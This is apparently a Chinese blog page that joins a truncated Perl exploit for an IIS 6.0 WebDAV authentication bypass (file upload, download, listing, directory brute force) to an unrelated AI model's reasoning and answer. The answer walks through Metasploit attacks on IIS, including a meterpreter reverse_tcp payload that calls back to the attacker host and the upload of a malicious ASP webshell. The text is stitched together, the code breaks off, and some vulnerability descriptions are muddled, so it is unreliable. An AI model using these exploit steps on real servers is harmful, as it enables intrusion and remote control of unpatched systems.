IIS 6.0 远程溢出漏洞

Oday摘要: 发布日期:2010-10.03发布作者:FoXHaCkEr影响版本:IIS6.0官方地址:Microsoft漏洞类型:远程溢出漏洞描述:微软IIS6.0一个远程溢出漏洞代码exp:#!/usr/bin/perl#*********!!!WARNING!!!*********#*FORSECURITYTESTiNGONLY!*#***********************************#

 

发布日期:2010-10.03
发布作者:FoX HaCkEr

影响版本:IIS 6.0
官方地址:Microsoft

漏洞类型:远程溢出

漏洞描述:微软IIS 6.0 一个远程溢出漏洞代码

exp: #!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 add brute force dir fuction.
# v1.0 download?upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target &nbs p; eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx

use IO::Socket;use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $bpath; # Bruteforce WebDAV path.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed

GetOptions(
"target=s" ; => /$target,
"port=i" => /$port,
"method=s" => /$method,
"xpath=s" => /$xpath,
"bpath=s" => /$bpath,
"file=s"

<think>嗯,用户问的是IIS有哪些漏洞可以用Metasploit(msf)进行渗透。首先,我需要回忆一下IIS的历史漏洞,尤其是那些已经被集成到Metasploit框架中的。记得IIS在不同版本中存在过多个漏洞,比如解析漏洞、缓冲区溢出远程代码执行等等。 首先,我应该考虑常见的IIS漏洞,比如CVE编号的。比如IIS 6.0的解析漏洞,这个比较经典,可能和文件名后缀有关,比如分号或者文件夹名解析的问题。然后是缓冲区溢出,比如CVE-2017-7269,这个影响IIS 6.0,是WebDAV中的溢出漏洞。还有最近的漏洞吗?比如CVE-2020-0645,可能涉及IIS远程代码执行。另外,IIS的CGI处理也可能存在问题,或者某些扩展模块的漏洞。 接下来要确认这些漏洞是否有对应的Metasploit模块。比如,CVE-2017-7269对应的msf模块是exploit/windows/iis/iis_webdav_scstoragepathfromurl,这个模块是否还在有效?需要检查。还有IIS 6.0的解析漏洞,可能对应的模块是exploit/windows/iis/iis_webdav_upload_asp,用于上传ASP文件。 另外,可能还有身份验证绕过漏洞,比如CVE-2015-1635(MS15-034),这个漏洞可能导致远程代码执行或拒绝服务,但可能已经被修补。Metasploit是否有对应的模块?记得有一个auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块,用于检测是否存在该漏洞。 用户可能需要具体的漏洞名称、CVE编号、对应的msf模块以及利用步骤。所以需要整理这些信息,分点说明,每个漏洞的利用步骤,包括设置参数、执行攻击等。同时,要提醒用户注意漏洞的影响版本,以及渗透测试的合法性问题,强调授权的重要性。 另外,需要注意语法正确,比如中文描述,使用正确的Metasploit模块路径,避免拼写错误。同时,可能存在的其他漏洞,比如IIS 7.0/7.5的解析漏洞,比如通过PUT方法上传文件,然后通过MOVE或COPY方法重命名为可执行后缀,但这类漏洞是否有对应的msf模块?比如iis_webdav_upload_asp可能适用于IIS 6.0,而其他版本可能不同。 还需要考虑漏洞的修补情况,比如大多数旧漏洞可能已经被修复,但在未打补丁的系统上仍然存在风险。因此,在回答中要说明影响的IIS版本,帮助用户确认目标环境是否可能存在这些漏洞。 总结来说,需要列出几个主要的IIS漏洞,对应的CVE,Metasploit中的模块路径,简要的利用步骤,以及注意事项。确保结构清晰,步骤明确,同时提醒合法性和授权问题。</think>好的,我将分步骤介绍IIS(Internet Information Services)中可通过Metasploit(msf)渗透的经典漏洞及利用方法。请注意,以下内容仅用于安全研究,需在合法授权范围内操作。 --- ### **1. IIS 6.0 WebDAV缓冲区溢出漏洞 (CVE-2017-7269)** **影响版本**: IIS 6.0 (Windows Server 2003) **漏洞原理**: 由于WebDAV服务对`ScStoragePathFromUrl`函数处理不当,攻击者可发送超长请求触发缓冲区溢出,实现远程代码执行。 **Metasploit模块**: ``` exploit/windows/iis/iis_webdav_scstoragepathfromurl ``` **利用步骤**: 1. 选择模块: ```bash use exploit/windows/iis/iis_webdav_scstoragepathfromurl ``` 2. 设置目标IP和端口: ```bash set RHOST <目标IP> set RPORT 80 ``` 3. 选择Payload(如反向TCP): ```bash set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <攻击机IP> ``` 4. 执行攻击: ```bash exploit ``` --- ### **2. IIS 6.0 分号解析漏洞** **影响版本**: IIS 6.0 **漏洞原理**: 当文件名包含分号(如`test.asp;.jpg`)时,IIS错误地将文件解析为ASP脚本,导致任意代码执行。 **Metasploit模块**: ``` exploit/windows/iis/iis_webdav_upload_asp ``` **利用步骤**: 1. 启用模块: ```bash use exploit/windows/iis/iis_webdav_upload_asp ``` 2. 配置目标信息: ```bash set RHOST <目标IP> set HttpUsername <用户名> # 若需要认证 set HttpPassword <密码> ``` 3. 上传恶意ASP文件并触发: ```bash exploit ``` --- ### **3. MS15-034 HTTP.sys远程代码执行漏洞 (CVE-2015-1635)** **影响版本**: IIS 7.0/7.5/8.0/8.5 (Windows Server 2008-2012) **漏洞原理**: HTTP.sys驱动处理`Range`请求头时存在缺陷,可导致内存泄露或拒绝服务(DoS)。 **Metasploit检测模块**: ``` auxiliary/scanner/http/ms15_034_http_sys_memory_dump ``` **验证步骤**: 1. 加载模块: ```bash use auxiliary/scanner/http/ms15_034_http_sys_memory_dump ``` 2. 设置目标: ```bash set RHOSTS <目标IP> set RPORT 80 ``` 3. 执行检测: ```bash run ``` --- ### **4. IIS 7.5/Nginx 解析漏洞(非CVE,实战常见)** **影响版本**: IIS 7.5 + PHP **漏洞原理**: 当请求路径包含`/.php`等后缀时,IIS错误地将非PHP文件解析为PHP脚本。 **利用方法**: - 手动上传图片马(如`test.jpg`),通过访问`http://目标/test.jpg/.php`触发解析。 --- ### **注意事项** 1. **授权合规性**: 渗透测试需获得明确书面授权。 2. **补丁情况**: 上述漏洞大多已发布官方补丁,需确认目标环境是否未更新。 3. **防御建议**: - 关闭不必要的WebDAV功能。 - 定期更新Windows Server和IIS补丁。 - 使用WAF拦截恶意请求(如超长Header、异常路径)。 --- 如需进一步分析特定漏洞,可提供更多环境信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值